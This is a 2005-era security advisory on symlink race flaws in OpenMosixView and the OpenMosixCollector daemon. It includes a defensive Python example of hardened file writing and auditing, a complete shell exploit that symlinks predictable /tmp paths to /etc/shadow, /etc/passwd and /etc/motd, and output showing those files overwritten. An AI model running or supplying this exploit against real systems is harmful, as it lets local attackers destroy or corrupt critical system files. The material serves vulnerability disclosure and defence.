OpenMosixView Multiple Race Conditions
Summary
OpenMosix is "a Linux kernel extension for single-system image clustering which turns a network of ordinary computers into a supercomputer".
OpenMosixView and the OpenMosixCollector daemon write to predictable file names under /tmp without checking what is already there or what type of file it is (a symbolic link, for example). This allows local attackers to remove or overwrite arbitrary files on a system running OpenMosix.
Credit:
The information has been provided by rexolab.
Details
Vulnerable Systems:
* OpenMosixView version 1.5 and prior
Each time the OpenMosixCollector daemon starts, the load data of every node is loaded from and saved to the directory /tmp/openmosixcollector, where it is organised in several files:
[ file ] cluster
[ file ] IDnode-n
[ file ] IDnode-n
[ file ] sync.count
[ dir ] phist
Because these file names are predictable, any local attacker can remove or overwrite arbitrary files on the vulnerable file system through a symlink attack: it is enough to pre-create a fake directory tree with symlinks in place of the expected files.
If the openmosixcollector daemon is already running, the file system can still be corrupted, because the daemon creates a predictable temporary backup directory every 12 hours (see the exploit below for details).
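The defect described above is the classic /tmp symlink race: a privileged process opens a predictable path for writing and the kernel follows whatever the attacker planted there. The following added example (not code from the advisory or from the OpenMosix project) contrasts that pattern with a hardened writer and shows the audit check an administrator can run against a collector directory. It runs entirely inside a constructed sandbox directory; the file names "openmosixcollector", "cluster" and "victim.txt" are taken from, or modelled on, the layout the advisory lists, and the function names are assumptions of this example.

```python
import errno
import os
import tempfile


def audit_collector_dir(path):
    """Return (name, target) for every entry in `path` that is a symlink.

    Uses lstat semantics (os.path.islink) so the link itself is inspected,
    not whatever it points at. This is the check an administrator would run
    against /tmp/openmosixcollector before trusting its contents.
    """
    findings = []
    if os.path.islink(path) or not os.path.isdir(path):
        return findings  # the directory itself is a link, or does not exist
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if os.path.islink(full):
            findings.append((name, os.readlink(full)))
    return findings


def write_data_unsafe(path, data):
    """The pattern the advisory describes: open a predictable path for writing
    and follow whatever is already there. If `path` is a symlink, the link
    target is truncated and overwritten."""
    with open(path, "w") as fh:
        fh.write(data)


def write_data_safe(path, data):
    """Hardened writer: O_NOFOLLOW refuses to traverse a symlink at `path`,
    and O_CREAT|O_EXCL refuses to reuse any pre-existing entry. Returns False
    (and writes nothing) when either condition triggers."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except OSError as exc:
        if exc.errno in (errno.EEXIST, errno.ELOOP):
            return False
        raise
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return True


def make_private_workdir(prefix="openmosixcollector-"):
    """Per-run directory with an unpredictable name and mode 0700, instead of
    the fixed /tmp/openmosixcollector (and the fixed _[date] backup name)."""
    return tempfile.mkdtemp(prefix=prefix)


def demo():
    """Constructed scenario: a planted symlink inside a predictable directory.

    Returns (victim_after_unsafe, victim_after_safe, audit_findings, safe_result,
    sandbox_path). The safe writer is exercised before the unsafe one so the
    victim file is still intact when the safe result is recorded.
    """
    sandbox = tempfile.mkdtemp(prefix="symlink-demo-")
    victim = os.path.join(sandbox, "victim.txt")
    with open(victim, "w") as fh:
        fh.write("original contents\n")

    collector = os.path.join(sandbox, "openmosixcollector")  # predictable dir
    os.mkdir(collector)
    link = os.path.join(collector, "cluster")  # planted in place of the data file
    os.symlink(victim, link)

    findings = audit_collector_dir(collector)

    safe_result = write_data_safe(link, "node data\n")
    with open(victim) as fh:
        after_safe = fh.read()

    write_data_unsafe(link, "node data\n")
    with open(victim) as fh:
        after_unsafe = fh.read()

    return after_unsafe, after_safe, findings, safe_result, sandbox


if __name__ == "__main__":
    unsafe, safe, found, ok, where = demo()
    print("audit findings:", found)
    print("safe writer wrote:", ok, "| victim now:", repr(safe))
    print("unsafe writer followed link | victim now:", repr(unsafe))
    print("private workdir example:", make_private_workdir())
```

The safe writer fails closed: on a symlink it gets ELOOP (O_NOFOLLOW) or EEXIST (O_EXCL), both of which are treated as "do not write". The second half of the fix is not creating the directory at a fixed path at all; make_private_workdir shows the mkdtemp approach, which also removes the predictable "_[date]" backup directory name the advisory mentions.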
Exploit:
#!/bin/sh
###############################################
# RX_oMcollector_proof.sh
# OpenMosixCollector exploit [25/03/2005]
# by Gangstuck and Psirac <research@rexotec.com>
###############################################
# -- Choose target
TARGET1="/etc/shadow" # OM view target
TARGET2="/etc/passwd" # OM collector target 1
TARGET3="/etc/motd" # OM collector target 2
# -- OpenMosixCollector temporary directory (without final '/')
OMCTDIR="/tmp/openmosixcollector"
echo "--------------------------------------------------------"
echo "- -= OpenMosixView and OpenMosixCollector =- -"
echo "- Symlink Vulnerability PoC -"
echo "- [versions 1.5 and minor] -"
echo "--------------------------------------------------------"
echo "- Gangstuck and Psirac -"
echo "- <research@rexotec.com> -"
echo "--------------------------------------------------------"
# -- OM View
ln -sf $TARGET1 /tmp/nodes.tmp
if [ $? ]; then
echo "[+] OpenMosixView attack successfully launched."
echo -e " - target is ${TARGET1}\n"
else
echo "[!] Failed to exploit OpenMosixView..."
fi
# -- OM Collector
if [ -d "$OMCTDIR" ]; then
echo -e "[!] Openmosix is already running.\n
Anyway, there is a way to exploit this case but this is not
implemented in this public exploit. OpenMosixcollector-daemon
automatically restarts every 12 hours and saves the current
history to a directory located in /tmp (glibc: P_tmpdir).
This is done whith the utilisation of a predictable temporary
dir name \"${OMCTDIR}_[date]\" where [date] format
look like \"18.0.2005-0.0.48\". Have phun :P"
exit 0
fi
echo -e "[-] OpenMosixCollector seems not to be started..."
echo " - creating fake directory"
mkdir $OMCTDIR
if [ ! $? ]; then
echo "[!] OpenMosixCollector attack failed !"
exit 1
fi
echo " - creating symlink attack against "
echo -e "\t> ${TARGET2}" && ln -sf $TARGET2 ${OMCTDIR}/cluster;
echo -e "\t> ${TARGET3}" && ln -sf $TARGET3 ${OMCTDIR}/sync.count;
echo "[+] OpenMosixCollector attack successfully launched."
#EOF
Proof of Concept:
$ ./RX_OMcollector_proof.sh
...
$ ls -l /tmp/nodes.tmp
lrwxrwxrwx 1 gang gang 12 2005-02-21 23:18 /tmp/nodes.tmp -> /etc/shadow
# openmosixview &
openMosix is started!
openMosix cluster contains 3 members.
cluster config changed! redraw cluster now.
$ cat /etc/shadow
192.168.0.11
# /etc/init.d/openmosixcollector start
Initializing openMosix...
openMosix configuration was successful :)
# ls -l /tmp/openmosixcollector/
lrwxrwxrwx 1 user user 12 2004-12-21 23:19 cluster -> /etc/passwd
drwxr-xr-x 2 root root 1024 2004-12-21 23:25 phist
lrwxrwxrwx 1 user user 12 2004-12-21 23:19 sync.count -> /etc/motd
# cat /etc/passwd
21.12.2005-23.25.59 5 184 1757 13 3
21.12.2005-23.26.10 5 184 1757 13 3
# cat /etc/motd